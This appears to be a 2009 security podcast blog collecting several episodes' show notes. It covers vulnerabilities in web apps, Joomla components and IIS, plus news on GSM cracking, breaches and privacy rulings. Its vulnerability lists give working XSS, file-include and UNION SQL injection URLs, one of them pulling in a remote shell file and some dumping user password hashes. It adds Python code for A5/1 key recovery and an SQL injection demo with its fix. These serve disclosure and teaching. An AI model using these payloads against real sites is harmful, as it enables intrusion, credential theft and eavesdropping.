Your daily source of Pwnage, Policy and Politics.

No Podcast Today

As we will be partying in the New Year, we’ve decided not to do a podcast today.

Episode 37 – Year End

InfoSec Podcast Episode 37 for December 30, 2009. This podcast is our contribution back to the community: we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Sponsors: This podcast is sponsored in part by Webspeedway, your Virtual IT Department. When your systems are down, the resulting downtime can have a devastating impact on a small or medium-sized business.

Webspeedway specializes in providing proactive solutions to mitigate the risks of downtime, data loss, e-mail viruses and the many other threats to your business systems. Webspeedway provides the services of a Fortune 500 IT department, including 24 x 7 monitoring and on-site support, all at a fraction of the cost of even one employee.

Go to www.webspeedway.com today to learn about their cost-effective IT management solutions for your business.

Announcements:
Community SANS Atlanta 2010 Spring Schedule has been posted.

SEC-606: Drive and Data Recovery Forensics 2/9/10 to 2/13/10
SEC-502: Perimeter Protection In-Depth 2/22/10 to 2/27/10
AUD-507: Auditing Networks, Perimeters, and Systems 3/15/10 to 3/20/10
MGT-512: SANS Security Leadership Essentials For Managers with Knowledge Compression 4/15/10 to 4/21/10
SEC-566: 20 Critical Security Controls – In Depth 5/17/10 to 5/21/10

Go online to register by going to http://www.sans.org/atlanta-cs-events-2010/?utm_source=web-sans&utm_medium=banner&utm_content=Featured_Community_SANS_atlanta-2010-cs_events&utm_campaign=Community_SANS_Atlanta_2010&ref=52093

or call (301) 654-SANS(7267).

Vulnerabilities of Interest:

  1. RoseOnlineCMS is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. This could be exploited to obtain potentially sensitive information or to execute local scripts. RoseOnlineCMS 3 B1 is vulnerable; other versions may also be affected. Example URL: http://www.example.com/modules/admincp.php?admin=[LFI%00]
  2. phpAuction is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. This could lead to execution of script code in the browser of an unsuspecting user in the context of the affected site, which may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. Example URLs: http://www.example.com/phpauction/register.php?TPL_name=1>”><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&TPL_nick=indoushka&TPL_password=indoushka@hotmail.com&TPL_repeat_password=indoushka@hotmail.com&TPL_email=indoushka@hotmail.com and http://www.example.com/phpauction/register.php?TPL_name=indoushka&TPL_nick=1%3E%22%3E%3CScRiPt%20%0d%0a%3Ealert(213771818860)%3B%3C/ScRiPt%3E&TPL_password=indoushka@hotmail.com&TPL_repeat_password=indoushka@hotmail.com&TPL_email=indoushka@hotmail.com&TP
  3. The ‘com_adagency’ component for Joomla! is subject to a local file-include vulnerability because it fails to properly sanitize user-supplied input. This could allow an attacker to obtain potentially sensitive information and execute local scripts in the context of the webserver process. Example URL: http://www.example.com/index.php?option=com_adagency&controller= [-LFI-]
  4. The Memory Book component for Joomla! is subject to an SQL-injection vulnerability and an arbitrary-file-upload vulnerability. These could allow an attacker to compromise the application, upload files, execute code, access or modify data, or exploit other vulnerabilities in the underlying database. Memory Book 1.2 is vulnerable; other versions may also be affected. All you need is a browser to exploit these vulnerabilities.
  5. DrBenHur.com DBHcms is subject to a remote file-include vulnerability because it fails to properly sanitize user-supplied input. This could allow an attacker to include a file containing malicious PHP code and execute it in the context of the webserver process, which may lead to a compromise of the application and the underlying system; other attacks are also possible. DBHcms 1.1.4 is vulnerable; other versions may also be affected. Example URL: http://www.example.com/index.php?dbhcms_core_dir=http://www.example.org/shell.txt%00
  6. UPDATE: The Microsoft IIS security-bypass vulnerability covered in Episode 36 could cause IIS to interpret unexpected files as CGI applications. For an exploit to succeed, IIS must be configured in a nondefault way and contrary to the vendor’s recommended best practices.
  7. The Q-Personel component for Joomla! is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. This could be leveraged to execute script code in the browser of an unsuspecting user. Q-Personel 1.0.2 (RC2) is vulnerable; other versions may be affected as well. Example URL: http://www.example.com/j15x/index.php?option=com_qpersonel&task=sirala&personel_sira=[XSS CODE]
  8. Stash is subject to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. These could be leveraged to execute script code in the browser of an unsuspecting user. Stash 1.0.3 is vulnerable; other versions may also be affected. To exploit these issues, an attacker must get the victim to follow a malicious URL.
  9. Calendar Express is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. This could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Example URL: http://www.example.com/calendarexpress2.1/year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+usi
News Items of Interest:
News item 1: According to Adult Protective Services workers, reports of financial scams involving elderly victims have steadily increased in this tough economy. They have some recommendations for those with elderly family members. First, they recommend that you really listen to elderly relatives when they talk about their lives. Are they mentioning new friends, people soliciting money at the front door for charities, or repairmen you’ve never heard of before? Is there talk of a new will? Has your loved one given money to someone recently? Is the phone jangling constantly with calls from telemarketing companies?

Take a good look around the house. Is there food in the refrigerator? Is the cupboard well-stocked with food that hasn’t expired? Do labels indicate that medications have been prescribed by one doctor, or many? Are medications being taken properly?

Seniors who have recently lost a spouse, close friend or child are particularly likely to isolate themselves, often leading to a spiral of depression, and they can be especially vulnerable to crooks.

It’s not enough that your elderly loved one still goes to the supermarket and drives a car: their executive function, or higher level of reasoning, can deteriorate with age.

If your older relatives use the Internet, make sure they’re not sitting ducks for cyber crime. Have they installed firewalls on their computers? Are their passwords easily guessed? Have they taken a computer security class?

News item 2: http://shmooslugs.pbworks.com/

Robert Fuller has a site for ShmooCon Slugs to help people get together for rides to ShmooCon 2010. If you’re not familiar with what slugging is, the site points to Wikipedia, which states: “Slugging, also known as casual carpooling, is the practice of forming ad hoc, informal carpools for purposes of commuting, essentially a variation of ride-share commuting and hitchhiking. While the practice is most common and most publicized in the congested Washington, D.C. area (where it is primarily used by commuters who live in Northern Virginia), slugging is also used in San Francisco, Pittsburgh, and other U.S. cities. Sluggers gather at local businesses and at government-run locations, albeit not always with official sanction.”

News item 3: http://lists.shmoo.com/mailman/listinfo/shmoocon-roommates

There is also a mailing list for ShmooCon attendees looking for roommates. ShmooCon is not responsible for actions based on, around, near, or anywhere near related to ShmooCon Roommates. Use at your own risk!

News item 4: http://reflextor.com/trac/a51
http://www.nytimes.com/2009/12/29/technology/29hack.html?_r=1&ref=technology
http://www.theregister.co.uk/2009/12/28/gsm_eavesdropping_breakthrough/
http://news.cnet.com/8301-1009_3-10422340-83.html?part=rss&subj=news&tag=2547-1_3-0-20

Computerworld has an interesting article on how simple it is for hackers to snoop on GSM cellular calls encrypted with the 64-bit cipher called A5/1. At the Chaos Communication Congress in Berlin, researcher Karsten Nohl said that he had compiled 2 terabytes worth of data: cracking tables that can be used as a kind of reverse phone book to determine the encryption key used to secure a GSM (Global System for Mobile communications) telephone conversation or text message. While Nohl stopped short of releasing a GSM-cracking device, which would be illegal in many countries, including the U.S., he said he divulged information that has been common knowledge in academic circles and made it “practically usable.”

According to Nohl, using his tables, antennas, specialized software, and $30,000 worth of computing hardware to break the cipher, someone can crack the GSM encryption in real time and listen in on calls. Let’s put this into perspective: there are about 3.5 billion GSM phones worldwide, making up about 80 percent of the mobile market, according to data from the GSM Association.
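
To make the shape of the attack concrete, here is an added example written for these notes (not code from Nohl’s project or from the articles linked above): a bit-level A5/1 keystream generator plus a toy version of the “reverse phone book”. Register lengths, taps, clocking bits and the key/frame loading order follow the published A5/1 description. Everything else is constructed: the session keys, the 22-bit frame number, and the 114-bit “known plaintext” burst the eavesdropper is assumed to be able to predict. Nohl’s real tables cover the full 64-bit space with rainbow-table compression and index internal state rather than the key directly; the dictionary below holds four constructed keys for one frame number, which is enough to show the principle: known plaintext XOR ciphertext gives keystream, and keystream is the lookup key.

```python
# Added example: A5/1 keystream generation and a toy keystream -> key lookup.
# Not Nohl's code. Keys, frame number and plaintext below are constructed.

# (register length, feedback taps, clocking bit) for R1, R2, R3.
# Bit 0 is the newest bit; the register's top bit feeds the output.
REGS = ((19, (13, 16, 17, 18), 8),
        (22, (20, 21), 10),
        (23, (7, 20, 21, 22), 10))


def _step(reg, length, taps, inject=0):
    """Clock one LFSR: feedback is the XOR of its taps, optionally XORed with a key/frame bit."""
    fb = inject
    for t in taps:
        fb ^= (reg >> t) & 1
    return ((reg << 1) | fb) & ((1 << length) - 1)


class A51:
    def __init__(self, key, frame):
        if len(key) != 8 or not 0 <= frame < (1 << 22):
            raise ValueError("A5/1 needs a 64-bit key and a 22-bit frame number")
        self.r = [0, 0, 0]
        # Key setup: 64 key bits, LSB of each byte first, all three registers clocked.
        for i in range(64):
            self._clock_all((key[i // 8] >> (i % 8)) & 1)
        # Frame setup: 22 frame-number bits, LSB first, all three registers clocked.
        for i in range(22):
            self._clock_all((frame >> i) & 1)
        # 100 warm-up cycles with majority (stop/go) clocking, output discarded.
        for _ in range(100):
            self._clock_majority()

    def _clock_all(self, bit):
        self.r = [_step(r, n, taps, bit) for r, (n, taps, _) in zip(self.r, REGS)]

    def _clock_majority(self):
        clk = [(r >> c) & 1 for r, (_, _, c) in zip(self.r, REGS)]
        maj = (clk[0] & clk[1]) | (clk[0] & clk[2]) | (clk[1] & clk[2])
        # Only the registers whose clocking bit agrees with the majority advance.
        self.r = [_step(r, n, taps) if c == maj else r
                  for r, c, (n, taps, _) in zip(self.r, clk, REGS)]

    def _output_bit(self):
        out = 0
        for r, (n, _, _) in zip(self.r, REGS):
            out ^= (r >> (n - 1)) & 1
        return out

    def keystream(self, nbits=228):
        """nbits of keystream as 0/1 ints; GSM uses 114 downlink + 114 uplink per frame."""
        bits = []
        for _ in range(nbits):
            self._clock_majority()
            bits.append(self._output_bit())
        return bits


def bits_to_int(bits):
    v = 0
    for b in bits:
        v = (v << 1) | b
    return v


def xor_bits(a, b):
    return [x ^ y for x, y in zip(a, b)]


def downlink_keystream(key, frame):
    return A51(key, frame).keystream(228)[:114]


def build_codebook(keys, frame):
    """Toy table: first 64 downlink keystream bits -> key, for one frame number."""
    return {bits_to_int(downlink_keystream(k, frame)[:64]): k for k in keys}


def recover_key(codebook, ciphertext_bits, known_plaintext_bits):
    """Eavesdropper: known plaintext XOR ciphertext = keystream; use it as the lookup key."""
    ks = xor_bits(ciphertext_bits, known_plaintext_bits)
    return codebook.get(bits_to_int(ks[:64]))


def run_demo():
    # Constructed keys; the victim's key is the last one.  Constructed frame number.
    keys = [bytes([i] * 8) for i in (0x11, 0x2A, 0x3C)] + [b"\x12\x23\x45\x67\x89\xab\xcd\xef"]
    victim_key, frame = keys[-1], 0x134
    # Constructed 114-bit burst whose content the attacker can predict.
    plaintext = [(i * 5 // 3) & 1 for i in range(114)]
    ciphertext = xor_bits(plaintext, downlink_keystream(victim_key, frame))
    return recover_key(build_codebook(keys, frame), ciphertext, plaintext)


if __name__ == "__main__":
    print("recovered key:", run_demo().hex())
```

The cost that makes this “practically usable” is in the table, not the lookup: once the table exists, recovering the key for a burst is a dictionary access, which is why the $30,000 figure is for the hardware that builds and searches the tables rather than for the eavesdropping itself.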

News item 5: http://www.nytimes.com/2009/12/26/opinion/26sat2.html?_r=2&adxnnl=1&adxnnlx=1261810873-sVGmBHkWduJvGowqvAkrFA

The Ohio Supreme Court has struck an important blow for privacy rights, ruling that the police need a warrant to search a cellphone. The court rightly recognized that cellphones today are a lot more than just telephones, that they hold a wealth of personal information and that the privacy interest in them is considerable. This was the first such ruling from a state supreme court. It is a model for other courts to follow.

The Ohio Supreme Court ruled this month, by a 4-to-3 vote, that the search violated the Fourth Amendment’s protection against unreasonable search and seizure. Rather than seeing a cellphone as a simple closed container, the majority noted that modern cellphones — especially ones that permit Internet access — are “capable of storing a wealth of digitized information.”

News item 6:http://www.wired.com/threatlevel/2009/12/montgomery-2
http://www.theregister.co.uk/2009/12/24/cia_montgomery/
A self-proclaimed software programmer who convinced the CIA that he had developed software capable of deciphering hidden messages in Al Jazeera broadcasts appears to have been responsible for an elevation in the national security level in late 2003, causing the grounding of international flights and the evacuation of the Metropolitan Museum of Art. Dennis Montgomery managed to convince a CIA Directorate of Science and Technology employee that his technology and the information it generated were credible. The information was passed to top government officials. Only later did it become evident that Montgomery had not shared his algorithms with anybody in the Government, nor was anyone in the government clear about how the information was obtained. Montgomery also reportedly received a no-bid US $30 million contract for “compression” and “automatic target recognition” technology that he claimed could analyze surveillance video from drones and identify weapons in people’s hands. A man who used to work with Montgomery says he helped fake about 40 demonstrations of the software.

News item 7: http://www.msnbc.msn.com/id/34611083/ns/technology_and_science-tech_and_gadgets/
Two New Jersey state legislators are sponsoring a bill that would impose hefty fines on people and/or organizations that send unsolicited text messages. Of particular concern to Sens. Joseph Vitale and Sean Kean are messages sent to the elderly and disabled and messages that cause people to exceed their monthly text message allotment, incurring additional costs from their providers. An unsolicited ad is defined as one that is sent without prior consent of the recipient that urges the recipient to rent or purchase services or merchandise. First time offenders would be fined up to US $10,000 and repeat offenders fined up to US $20,000. If the violator knew or should have known that the recipient was an elderly or disabled person, the maximum fine increases to US $30,000.

News item 8: http://www.theregister.co.uk/2009/12/24/ddos_attack_ultradns_december_09/
http://www.computerworld.com/s/article/9142681/DDoS_attack_on_DNS_hits_Amazon_and_others_briefly?source=rss_security
http://www.cnn.com/2009/TECH/12/24/cnet.ddos.attack/index.html
http://www.informationweek.com/news/storage/security/showArticle.jhtml?articleID=222100146
A distributed denial-of-service (DDoS) attack against the DNS provider for Amazon, Wal-Mart, the Gap and other shopping websites made those sites temporarily unavailable. The attack, launched against Neustar’s UltraDNS service on December 23, affected users in Northern California. The sites were unavailable for about an hour, and last-minute holiday shoppers experienced frustrating delays. An UltraDNS spokesperson said that “queries may have taken some time to resolve and some may not have been completed, but there never was an outage.”

News item 9: http://www.washingtonpost.com/wp-dyn/content/article/2009/12/23/AR2009122302970_pf.html
A report from the Government Accountability Office (GAO) faults five government agencies, two congressional offices and the National Security Council for the leak of information about hundreds of US civilian nuclear facilities. The document was published on the Government Printing Office website in June and remained visible for about one day. The document was intended for the International Atomic Energy Agency (IAEA). Some of the confusion stemmed from the document’s classification with an IAEA term that is not recognized in the US. NSC did not provide specific instructions for handling the document once delivered to the White House clerk’s office.

News item 10: http://abcnews.go.com/Business/wireStory?id=9418695
A US federal judge has granted preliminary approval to a proposed settlement that would have Countrywide Financial Corp. provide free credit monitoring to as many as 17 million people whose personal information was compromised. The settlement also provides up to US $50,000 in reimbursement for each instance of identity fraud that can be traced to the breach, for which the victims were not reimbursed otherwise, and in which they lost something of value. The suit has its origins in data theft committed by former Countrywide analyst Rene Rebollo Jr., who downloaded thousands of customers’ information every week for two years and sold it to Wahid Siddiqi. Siddiqi pleaded guilty to fraud earlier this month; Rebollo’s trial is scheduled to begin in January.

News item 11: http://www.theregister.co.uk/2009/12/24/inmate_prison_hack/
http://www.computerworld.com/s/article/9142628/Inmate_gets_18_months_for_hacking_prison_computer
Francis G. Janosko has been sentenced to 18 months in prison for breaking into the Plymouth (Massachusetts) County Correctional Facility’s computer network, accessing information about more than 1,100 prison employees and making that information available to other inmates. Janosko pleaded guilty to damaging a protected computer in September. Janosko, who was an inmate at the time on unrelated charges, was using a machine that was supposed to be configured to allow access only to a legal research program, but he exploited a vulnerability that gave him access to the Internet and to the prison network.

News item 12: http://www.darkreading.com/security/attacks/showArticle.jhtml?articleID=222003024&subSection=Attacks/breaches
http://www.scmagazineus.com/citibank-refutes-reported-hack-by-russian-gang/article/160124/
http://news.cnet.com/8301-1009_3-10420308-83.html
http://www.cbsnews.com/stories/2009/12/23/eveningnews/main6016135.shtml
http://online.wsj.com/article/SB126145280820801177.html?mod=rss_Today%27s_Most_Popular
While the FBI says it is investigating losses totaling tens of millions of dollars from Citibank accounts, Citibank parent company Citigroup denies reports that it has fallen prey to a cyber attack or that an investigation is underway. Citigroup did acknowledge that its systems have been probed but persisted in denying that an attack occurred or that money was stolen from customer accounts. The cyber thieves allegedly used the Black Energy botnet in their attacks. Sources have suggested that the Russian Business Network, a notorious cybercrime network, is behind the cyber heists. There is a report of one man being blocked from accessing his company’s Citibank account; although he alerted the bank immediately, a day later more than US $1 million had been withdrawn without his authorization. About 80 percent of the funds were recovered, and Citibank covered the man’s losses for the rest.

News item 13: http://www.scmagazineuk.com/mbna-confirms-data-loss-after-laptop-containing-personal-details-of-thousands-of-customers-was-stolen-from-vendor/article/160217/
http://www.net-security.org/secworld.php?id=8656
http://www.lep.co.uk/news/Customer-credit-card-details-stolen.5929370.jp
MBNA is notifying thousands of customers that a laptop stolen from the offices of NCO Europe, a third-party contractor, contains their credit card information. Although the files do contain personal information, no PINs are believed to be included. While no fraudulent activity has been detected on the compromised accounts, MBNA is offering affected customers one year of credit monitoring service and is monitoring all compromised accounts.

Episode 36

InfoSec Podcast Episode 36 for December 29, 2009. This podcast is our contribution back to the community: we discuss the vulnerabilities of interest and information security related news, hopefully providing you a few laughs and a little knowledge.

Vulnerabilities of Interest:

  1. APC Switched Rack Power Distribution Units (PDU) are subject to a cross-site scripting vulnerability because the device’s web interface fails to properly sanitize user-supplied input. This may be leveraged to execute script code in the browser of an unsuspecting user in the context of the affected site, which may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. APC Switched Rack PDU AP7932 is vulnerable; other versions may also be affected. Attackers can exploit this issue by enticing an unsuspecting user to follow a malicious URI. Example URL: http://www.example.com/Forms/login1?login_username=<ScRiPt>alert('hello');</ScRiPt>
  2. The Kleinanzeigenmarkt plugin for Woltlab Burning Board is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could result in a compromise of the application, access to or modification of data, or exploitation of the underlying database. All it takes is a browser to exploit this issue. Exploit code is available in the wild.
  3. Pragyan CMS is subject to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. This could result in a compromise of the application and potentially of the complete system. Pragyan CMS 2.6.4 is vulnerable; other versions may also be affected. Exploiting these issues is as simple as using a browser and the example URLs: http://www.example.com/cms/modules/search/search.php?moduleFolder=[Evil] and http://www.example.com/cms/modules/search/search.php?sourceFolder=[Evil].
  4. Jax Guestbook is subject to an authentication-bypass vulnerability which could allow an attacker to gain administrative access to the affected script and make configuration changes. This could lead to further attacks. Jax Guestbook 3.50 is vulnerable; other versions may also be affected. Exploiting this issue is as simple as using a browser and the example URL: http://www.example.com/admin/guestbook/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0
  5. MyBB is subject to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. This may be leveraged to execute script code in the browser of a user in the context of the affected site, which could allow the attacker to steal cookie-based authentication credentials and to launch additional attacks. MyBB 1.4.10 is vulnerable; other versions may be affected as well. Exploiting this issue requires enticing a user to follow a malicious URL. Example URLs: http://www.example.com/myps.php?action=donate&username="/> and http://www.example.com/myps.php?action=donate&username=<IMG""">">
  6. The Automated Logout module for Drupal is subject to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. This may be leveraged to execute script code in the browser of a user in the context of the affected site. Automated Logout 6.x-1.6, 6.x-2.2 and prior versions are vulnerable.
  7. Wireshark is subject to multiple denial-of-service vulnerabilities and a buffer-overflow vulnerability which may allow an attacker to crash the application and deny service to legitimate users. Additionally, these vulnerabilities could possibly result in the execution of code in the context of users running the application. These issues affect Wireshark 0.9.0 through 1.2.4. Proof-of-concept capture files for the denial-of-service issues are available from the following locations: https://bugs.wireshark.org/bugzilla/attachment.cgi?id=4055 and http://www.wireshark.org/download/automated/captures/fuzz-2009-12-07-11141.pcap.
  8. The ‘com_schools’ component for Joomla! is subject to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application and access or modify data in the underlying database. Example URL: http://www.example.com/path/index.php?option=com_schools&Itemid=89&schoolid=-53+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+jos_users--
  9. Microsoft IIS is prone to a security-bypass vulnerability that may result in IIS interpreting unexpected files as CGI applications. Attackers may be able to exploit this vulnerability to bypass intended security restrictions. Reports indicate that IIS 7.5 is not vulnerable to this issue; furthermore, it is currently unknown whether IIS 7.0 is vulnerable.
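
The union-based injections against ‘com_schools’ above and against Calendar Express in Episode 37 follow the same pattern: a numeric parameter is pasted into the query, a negative id empties the legitimate result, and a UNION SELECT with the same column count pulls rows from another table into the page. Here is an added example (written for these notes, not code from Joomla!, the components, or Calendar Express) that runs that pattern against an in-memory SQLite database and puts the parameterized version beside it. The table names, rows and ‘hash’ strings are constructed. The payloads on the page are MySQL-specific (the 0x3a hex literal for ‘:’, eleven columns to match the component’s query), so the payload here is adapted to SQLite (|| ':' || for concatenation, three columns to match the constructed query).

```python
# Added example: union-based SQL injection against a constructed SQLite schema,
# alongside the parameterized query that refuses it.  Not the components' code.
import sqlite3


def make_db():
    """Constructed schema: a lookup table the page queries and a user table it should not."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE schools(id INTEGER PRIMARY KEY, name TEXT, city TEXT);
        INSERT INTO schools VALUES (53, 'Example High School', 'Atlanta');
        CREATE TABLE jos_users(username TEXT, password TEXT);
        INSERT INTO jos_users VALUES ('admin',  'hash-of-admin-password');
        INSERT INTO jos_users VALUES ('editor', 'hash-of-editor-password');
    """)
    return con


# -53 matches nothing, so only the injected row comes back.  The UNION's column
# count must equal the original SELECT's (3 here, 11 in the com_schools URL), and
# the trailing comment discards whatever the application appends to the query.
PAYLOAD = "-53 union select 1, group_concat(username || ':' || password), 3 from jos_users--"


def vulnerable_lookup(con, schoolid):
    """The bug: the request parameter becomes part of the SQL text."""
    sql = "SELECT id, name, city FROM schools WHERE id = " + schoolid
    return con.execute(sql).fetchall()


def safe_lookup(con, schoolid):
    """The fix: validate the type, then bind the value, so it can never be parsed as SQL."""
    try:
        sid = int(schoolid)
    except ValueError:
        raise ValueError("schoolid must be an integer") from None
    return con.execute("SELECT id, name, city FROM schools WHERE id = ?", (sid,)).fetchall()


def dumped_credentials(con):
    """What the attacker reads off the page: a fake 'school' row whose name is the user table."""
    rows = vulnerable_lookup(con, PAYLOAD)
    return rows[0][1] if rows else None


if __name__ == "__main__":
    db = make_db()
    print("legit:   ", vulnerable_lookup(db, "53"))
    print("injected:", dumped_credentials(db))
    try:
        safe_lookup(db, PAYLOAD)
    except ValueError as e:
        print("rejected:", e)
```

Both defences matter: the integer cast alone would stop this payload, but binding the parameter is what protects string parameters such as the ones in the XSS items above, where no cast applies.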
News Items of Interest:
News item 1: http://www.businesswire.com/portal/site/home/permalink/?ndmViewId=news_view&newsId=20091226005004&newsLang=en
Amazon.com on Saturday released its annual post-Christmas statement on holiday sales and made one thing clear: the Kindle was king.   Amazon.com 2009 Holiday Facts (www.amazon.com only):

  • Amazon customers purchased enough fruit cake to equal the weight of a 1967 Volkswagen Bug.
  • Amazon customers bought enough gingerbread house kits that if stacked on top of each other would be as tall as the Sears Tower.
  • If all the computers customers purchased this holiday were stacked one on top of the other, they would be more than twice as high as Mt. Everest.
  • Amazon customers bought over 50 times more Light Therapy devices this holiday season than there are sunny days in Seattle the entire year.
  • For the holiday time period alone, Amazon customers purchased enough shoot-and-share camcorders to supply 50 years’ worth of non-stop YouTube watching.
  • Amazon customers bought enough Levi’s jeans to clothe everyone at the opening ceremony of the 2010 Olympics in Vancouver.
  • Amazon customers purchased so many Blu-ray disc players that if you lined them up side to side, they would stretch for more than 27 miles.
  • During the 2009 holiday season, Amazon customers bought enough 8 GB iPod touches to play 442 years of continuous music.
  • In 2009, Amazon customers purchased enough heart rate monitor watches to put one on the wrist of everyone who finished the New York City marathons in 2008 and 2009.
  • Amazon customers purchased enough Frustration-Free Package items to eliminate over 32,000 pounds of frustrating plastic materials, such as plastic clamshells.
  • The last One-Day Prime order that was delivered in time for Christmas, was placed on Dec. 23 at 9:17 p.m. Pacific and shipped to Boca Raton, Florida for delivery on Dec. 24. The item was a pair of Yellow Gold 8-8.5mm Freshwater Cultured Pearl Stud Earrings.
  • The last Local Express Delivery order that was delivered in time for Christmas, was placed by a Prime member and went to Seattle. It was a Kindle that was ordered at 1:43 p.m. on Christmas Eve and delivered at 4:57 p.m. that evening.

Amazon.com’s Hot Holiday Bestsellers (Nov. 15 through Dec. 19, based on units ordered):

  • Electronics: Kindle Wireless Reading Device; Apple iPod touch 8 GB; and Garmin nuvi 260W 4.3-inch GPS
  • Toys: Scrabble Slam Cards; The Settlers of Catan; and Scene It? Twilight Deluxe Edition
  • Video Games and Hardware: Wii Fit Plus with Balance Board; New Super Mario Bros; and Call of Duty: Modern Warfare 2

News item 2: http://seclists.org/fulldisclosure/2009/Dec/438
As discussed last week, it appears that DECAF was disabled by the authors at decafme.org. Well, it looks like some people over at soldierx.com have patched the binary to re-enable it and remove the phone-home functionality. The files are at http://thepiratebay.org/torrent/5238072/DECAF-SOLDIERX.rar or http://www.multiupload.com/88TEOEYCSZ. Of the sites listed on the multiupload.com site, I had problems with both RapidShare and MegaUpload. The other sites seemed to work well.

News item 3: http://ontheflix.com/2009/12/25/celtics-ray-allen-twitter-account-gets-hacked-sends-naughty-tweets/
It seems that Celtics shooting guard Ray Allen’s Twitter account was hacked and was apparently sending some pretty naughty tweets. The Huffington Post is reporting tweets such as: “I’m getting there. When you masturbate think about my tongue or your cl*t and switching back and forth from my d**k to my tongue.”

The tweets were deleted later on, and 14 minutes later another tweet showed up with an apology, claiming he was not responsible. It read: “I’m sorry my acct was hacked into. I need to changey tweet handle.” He then changed his Twitter name from @sugarray20 to @greenrayn20. Ray Allen said he may have to get off Twitter if this continues to happen. He tweeted, “i hope that it was amusing to people but im either gonna change my password or stop tweeting altogether.”

News item 4: http://www.wired.com/dangerroom/2009/12/not-just-drones-militants-can-snoop-on-most-us-warplanes/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+wired%2Fpolitics+%28Wired%3A+Politics%29
Wired Magazine is reporting that militants tapping into drones’ video feeds was just the start. Apparently, the U.S. military’s system for bringing overhead surveillance down to soldiers and Marines on the ground is also vulnerable to electronic interception. That means militants have the ability to see the video feeds from traditional fighters and bombers as well as from unmanned spy planes. The problem is in the process of being addressed, but for now an enormous security breach is even larger than previously thought.

So what is to blame? Apparently, the feeling is that early on units were “fielded so fast that it was done with an unencrypted signal. It could be both intercepted (e.g. hacked into) and jammed”. The question is why it is taking 10 years to fix the issue. You’ve got satellite providers in the L, C, S and Ku bands that are sending data encrypted, so it’s not like this is new technology. What’s the big deal? Well, imagine trying to ensure that all units in a theater have the correct encryption/decryption keys necessary to receive the data they need. This is really where the issue is. Do you trust the small units with these keys? How do you handle key rotation?

News item 5: http://blog.tenablesecurity.com/2009/12/top-10-nessus-plugins-for-2009.html

In 2009, Tenable released over 8,100 new plugins (and the year isn’t over yet!). These plugins cover several different types of vulnerabilities, including web applications, embedded systems, local checks for operating systems and much more. Tenable polled its employees to find some of their favorite plugins released this year, and compiled the following list:

  1. DD-WRT HTTP Daemon Metacharacter Injection Remote Code Execution – This vulnerability allows remote attackers to inject commands via a flaw in the HTTP management web application on embedded systems running DD-WRT.
  2. Windows Remote Registry Enable/Disable – For remote authenticated checks to run on Windows systems, the remote registry service needs to be enabled. While this may not be a service you wish to run on all your systems, this plugin solves that problem by temporarily enabling and then disabling the remote registry service when the scan has completed.
  3. PCI Test Requirements – Back in April of 2009, I wrote a blog post titled “PCI DSS Auditing Linux, Apache, PHP & MySQL with Nessus 4”.
  4. USB Drives Enumeration – In 2009, over 218 million records fell into the wrong hands due to some form of breach (According to a report generated by DataLossDB). Some of those data loss incidents can be attributed to removable media such as USB thumb drives.
  5. Malware Infected Host -  This Nessus plugin will seek out and report on these types of HTTP servers.
  6. Dell Remote Access Controller Default Password (calvin) for ‘root’ Account
  7. Conficker Detection (uncredentialed check) – Conficker was one of the major malware releases in 2009. This Nessus plugin could detect it on remote systems without using credentials.
  8. Backported Security Patches (HTTP) – This plugin looks at Linux distribution banners for common FTP, HTTP and SSH services that seem as if they have not been patched, but in fact have most likely been fixed.
  9. Microsoft Windows SMB Shares Access – This plugin that keeps on giving! A simple plugin, but one of the most likely to fire during an internal audit where Windows machines are found. The shared drives could contain nothing or they could contain the entire HR database.
  10. Enhanced Web Application Testing Plugins – Not a plugin per se, but a bunch of enhanced web app tests, with options that didn’t exist before ’09.

News item 6: http://www.wafb.com/Global/story.asp?S=11661499

A story about a 21-year-old being caught on camera is probably nothing new. Stealing decoy cameras is a little odd. A landowner having set up the decoy cameras to capture the theft of his digital game surveillance cameras is even odder. Believe it or not, Dustin Archibald of Denham Springs was caught on camera stealing a camera, with a “No Trespassing” sign visible in the background.

Archibald claims that he was not stealing the camera, but rather taking it so the landowner would not be able to hunt deer in the area. Unfortunately for him, with the property owner’s photographic evidence from his surveillance cameras, Archibald was identified right away and he consequently turned himself in to authorities.

The take-away here is that you never know what is watching a device that watches.

Episode 35 – Interview with Dave Shackleford

Tonight we are joined by a very special guest, Dave Shackleford. Dave is the Director, Risk & Compliance and Interim Director, Security Assessments at Sword & Shield Enterprise Security, Inc. (http://www.sses.net). Additionally, Dave is the SANS Institute GIAC technical director. Dave is the co-author of Hands-On Information Security from Course Technology as well as the “Managing Incident Response” chapter in the Course Technology book Readings and Cases in the Management of Information Security. Recently, Dave co-authored the first published course on virtualization security for the SANS Institute. Dave currently serves on the board of directors at the Technology Association of Georgia’s Information Security Society and the SANS Technology Institute. He is also the author of the Shackfoo article titled “One for the n00bs”.

Merry Christmas

Merry Christmas from our family to yours.